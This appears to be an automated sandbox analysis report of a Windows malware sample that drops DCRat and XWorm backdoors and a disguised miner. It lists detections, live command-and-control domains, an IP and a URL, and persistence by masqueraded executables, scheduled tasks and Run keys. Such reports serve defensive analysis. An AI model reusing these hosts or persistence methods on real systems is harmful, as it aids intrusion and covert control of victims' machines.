                      Source: Yara matchFile source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ywXeiXEvP2.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Result.exe PID: 4900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7204, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ServerWeb.exe PID: 7488, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 7280, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: conhost.exe PID: 2008, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe PID: 7368, type: MEMORYSTR
                      Source: Yara matchFile source: Result.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.3.Result.exe.b10a30.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.7c9678.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.XClient.exe.480000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.7c9678.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.Result.exe.b10a30.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.Result.exe.b08218.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.466afd.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.Result.exe.415eec.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: ywXeiXEvP2.exe PID: 6852, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Result.exe PID: 4900, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: XClient.exe PID: 7204, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information12
                      Scripting
                      Valid Accounts211
                      Windows Management Instrumentation
                      12
                      Scripting
                      1
                      Exploitation for Privilege Escalation
                      11
                      Disable or Modify Tools
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Deobfuscate/Decode Files or Information
                      LSASS Memory2
                      File and Directory Discovery
                      Remote Desktop Protocol1
                      Clipboard Data
                      1
                      Non-Standard Port
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      1
                      Bypass User Account Control
                      21
                      Obfuscated Files or Information
                      Security Account Manager37
                      System Information Discovery
                      SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron321
                      Registry Run Keys / Startup Folder
                      11
                      Process Injection
                      21
                      Software Packing
                      NTDS241
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture11
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Scheduled Task/Job
                      1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts321
                      Registry Run Keys / Startup Folder
                      1
                      Bypass User Account Control
                      Cached Domain Credentials131
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1455415 Sample: ywXeiXEvP2.exe Startdate: 11/06/2024 Architecture: WINDOWS Score: 100 74 letter-takes.gl.at.ply.gg 2->74 82 Snort IDS alert for network traffic 2->82 84 Found malware configuration 2->84 86 Malicious sample detected (through community Yara rule) 2->86 88 16 other signatures 2->88 12 ywXeiXEvP2.exe 10 2->12         started        15 FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe 2->15         started        18 conhost.exe 2->18         started        20 conhost.exe 2->20         started        signatures3 process4 file5 72 C:\Users\user\AppData\Local\...\Result.exe, PE32 12->72 dropped 22 Result.exe 3 12->22         started        112 Multi AV Scanner detection for dropped file 15->112 signatures6 process7 file8 54 C:\Users\user\AppData\Local\...\XClient.exe, PE32 22->54 dropped 56 C:\Users\user\AppData\...\DCRatBuild.exe, PE32 22->56 dropped 90 Antivirus detection for dropped file 22->90 92 Multi AV Scanner detection for dropped file 22->92 94 Machine Learning detection for dropped file 22->94 26 DCRatBuild.exe 3 11 22->26         started        30 XClient.exe 5 22->30         started        signatures9 process10 dnsIp11 66 C:\Users\user\AppData\...\ServerWeb.exe, PE32 26->66 dropped 68 C:\Users\user\AppData\...\UGsUclNNu9UBh.vbe, data 26->68 dropped 104 Antivirus detection for dropped file 26->104 106 Multi AV Scanner detection for dropped file 26->106 108 Machine Learning detection for dropped file 26->108 33 wscript.exe 1 26->33         started        36 wscript.exe 26->36         started        76 letter-takes.gl.at.ply.gg 147.185.221.19, 50230, 53164, 53165 SALSGIVERUS United States 30->76 78 127.0.0.1 unknown unknown 30->78 70 C:\Users\user\AppData\Roaming\XClient.exe, PE32 30->70 dropped 110 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 30->110 file12 signatures13 process14 signatures15 80 Windows Scripting host queries suspicious COM object (likely to drop second stage) 33->80 38 cmd.exe 33->38         started        process16 process17 40 ServerWeb.exe 38->40         started        44 conhost.exe 38->44         started        file18 58 C:\...\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe, PE32 40->58 dropped 60 C:\...\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe, PE32 40->60 dropped 62 C:\...\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe, PE32 40->62 dropped 64 11 other malicious files 40->64 dropped 96 Antivirus detection for dropped file 40->96 98 Multi AV Scanner detection for dropped file 40->98 100 Creates an undocumented autostart registry key 40->100 102 7 other signatures 40->102 46 schtasks.exe 40->46         started        48 schtasks.exe 40->48         started        50 schtasks.exe 40->50         started        52 23 other processes 40->52 signatures19 process20

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      ywXeiXEvP2.exe74%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                      SourceDetectionScannerLabelLink
                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Local\Temp\XClient.exe100%AviraHEUR/AGEN.1305769
                      C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe100%AviraHEUR/AGEN.1323984
                      C:\Recovery\XClient.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\XClient.exe100%AviraHEUR/AGEN.1305769
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe100%AviraVBS/Runner.VPG
                      C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%AviraVBS/Runner.VPG
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\jDownloader\config\conhost.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe100%AviraVBS/Runner.VPG
                      C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe100%AviraVBS/Runner.VPG
                      C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files\Uninstall Information\OfficeClickToRun.exe100%AviraHEUR/AGEN.1323984
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%AviraHEUR/AGEN.1323984
                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\XClient.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe100%Joe Sandbox ML
                      C:\Recovery\XClient.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\XClient.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\jDownloader\config\conhost.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe100%Joe Sandbox ML
                      C:\Program Files\Uninstall Information\OfficeClickToRun.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe100%Joe Sandbox ML
                      C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files (x86)\jDownloader\config\conhost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Uninstall Information\OfficeClickToRun.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\ProgramData\Microsoft\Windows\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Recovery\XClient.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Local\Temp\DCRatBuild.exe73%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                      C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe95%ReversingLabsWin32.Trojan.DisguisedXMRigMiner
                      C:\Users\user\AppData\Local\Temp\XClient.exe96%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                      C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\sihost.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Users\user\AppData\Roaming\XClient.exe96%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                      C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Windows\IME\IMEKR\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      127.0.0.10%Avira URL Cloudsafe
                      letter-takes.gl.at.ply.gg0%Avira URL Cloudsafe
                      http://a0991799.xsph.ru/@=AjM2MDZ4kjN100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      letter-takes.gl.at.ply.gg
                      147.185.221.19
                      truetrue
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        letter-takes.gl.at.ply.ggtrue
                        • Avira URL Cloud: safe
                        unknown
                        http://a0991799.xsph.ru/@=AjM2MDZ4kjNtrue
                        • Avira URL Cloud: malware
                        unknown
                        127.0.0.1true
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameXClient.exe, 00000003.00000002.4161351133.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, ServerWeb.exe, 00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        147.185.221.19
                        letter-takes.gl.at.ply.ggUnited States
                        12087SALSGIVERUStrue
                        IP
                        127.0.0.1
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1455415
                        Start date and time:2024-06-11 20:06:10 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 12m 5s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:52
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:ywXeiXEvP2.exe
                        renamed because original name is a hash value
                        Original Sample Name:a8a4603bc85e306e0fdd17655e4820e4.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@48/39@1/2
                        EGA Information:
                        • Successful, ratio: 28.6%
                        HCA Information:
                        • Successful, ratio: 63%
                        • Number of executed functions: 287
                        • Number of non-executed functions: 123
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                        • Exclude process from analysis (whitelisted): Conhost.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, a0991799.xsph.ru
                        • Execution Graph export aborted for target FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe, PID 7368 because it is empty
                        • Execution Graph export aborted for target ServerWeb.exe, PID 7488 because it is empty
                        • Execution Graph export aborted for target XClient.exe, PID 7204 because it is empty
                        • Execution Graph export aborted for target conhost.exe, PID 2008 because it is empty
                        • Execution Graph export aborted for target conhost.exe, PID 7280 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: ywXeiXEvP2.exe
                        TimeTypeDescription
                        14:07:09API Interceptor14036822x Sleep call for process: XClient.exe modified
                        19:07:11AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                        19:07:18Task SchedulerRun new task: conhost path: "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                        19:07:18Task SchedulerRun new task: conhostc path: "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                        19:07:18Task SchedulerRun new task: FMxFFfLOKpqCLtTFEmbkPKJrDwH path: "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:07:19Task SchedulerRun new task: FMxFFfLOKpqCLtTFEmbkPKJrDwHF path: "C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:07:19Task SchedulerRun new task: RuntimeBroker path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
                        19:07:19Task SchedulerRun new task: RuntimeBrokerR path: "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
                        19:07:19Task SchedulerRun new task: sihost path: "C:\Users\user\SendTo\sihost.exe"
                        19:07:19Task SchedulerRun new task: sihosts path: "C:\Users\user\SendTo\sihost.exe"
                        19:07:22Task SchedulerRun new task: OfficeClickToRun path: "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
                        19:07:22Task SchedulerRun new task: OfficeClickToRunO path: "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
                        19:07:22Task SchedulerRun new task: UserOOBEBroker path: "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
                        19:07:22Task SchedulerRun new task: UserOOBEBrokerU path: "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
                        19:07:22Task SchedulerRun new task: XClient path: "C:\Recovery\XClient.exe"
                        19:07:22Task SchedulerRun new task: XClientX path: "C:\Recovery\XClient.exe"
                        19:07:28AutostartRun: WinLogon Shell "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:07:36AutostartRun: WinLogon Shell "C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe"
                        19:07:45AutostartRun: WinLogon Shell "C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:07:53AutostartRun: WinLogon Shell "C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:08:02AutostartRun: WinLogon Shell "C:\Users\user\SendTo\sihost.exe"
                        19:08:10AutostartRun: WinLogon Shell "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                        19:08:18AutostartRun: WinLogon Shell "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:08:26AutostartRun: WinLogon Shell "C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:08:34AutostartRun: WinLogon Shell "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
                        19:08:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH "C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:08:47AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe"
                        19:08:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\user\SendTo\sihost.exe"
                        19:09:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                        19:09:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
                        19:09:20AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
                        19:09:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient "C:\Recovery\XClient.exe"
                        19:09:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH "C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:09:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe"
                        19:09:53AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\user\SendTo\sihost.exe"
                        19:10:01AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                        19:10:09AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
                        19:10:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
                        19:10:26AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient "C:\Recovery\XClient.exe"
                        19:10:34AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run FMxFFfLOKpqCLtTFEmbkPKJrDwH "C:\Windows\ELAMBKUP\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe"
                        19:10:42AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Program Files\Windows Photo Viewer\en-GB\RuntimeBroker.exe"
                        19:10:50AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run sihost "C:\Users\user\SendTo\sihost.exe"
                        19:10:58AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Program Files (x86)\jdownloader\config\conhost.exe"
                        19:11:07AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run UserOOBEBroker "C:\Program Files\Windows Photo Viewer\en-GB\UserOOBEBroker.exe"
                        19:11:15AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun "C:\Program Files\Uninstall Information\OfficeClickToRun.exe"
                        19:11:23AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run XClient "C:\Recovery\XClient.exe"
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        147.185.221.19SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeGet hashmaliciousAmadey, RedLine, RisePro StealerBrowse
                        • b-stamps.gl.at.ply.gg:30946/
                        X82dKIfzi3.exeGet hashmaliciousRedLineBrowse
                        • rights-mountains.gl.at.ply.gg:23403/
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        letter-takes.gl.at.ply.gg2RfhxxWcuH.exeGet hashmaliciousDCRat, XWormBrowse
                        • 147.185.221.19
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        SALSGIVERUS2RfhxxWcuH.exeGet hashmaliciousDCRat, XWormBrowse
                        • 147.185.221.19
                        6m45X1uPnb.exeGet hashmaliciousNjratBrowse
                        • 147.185.221.20
                        kzERQcdqmc.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                        • 147.170.50.220
                        cNjgs425Sf.exeGet hashmaliciousQuasarBrowse
                        • 147.185.221.19
                        GIWRAEiTj1.exeGet hashmaliciousNjratBrowse
                        • 147.185.221.19
                        bMAplZixhH.exeGet hashmaliciousNjratBrowse
                        • 147.185.221.19
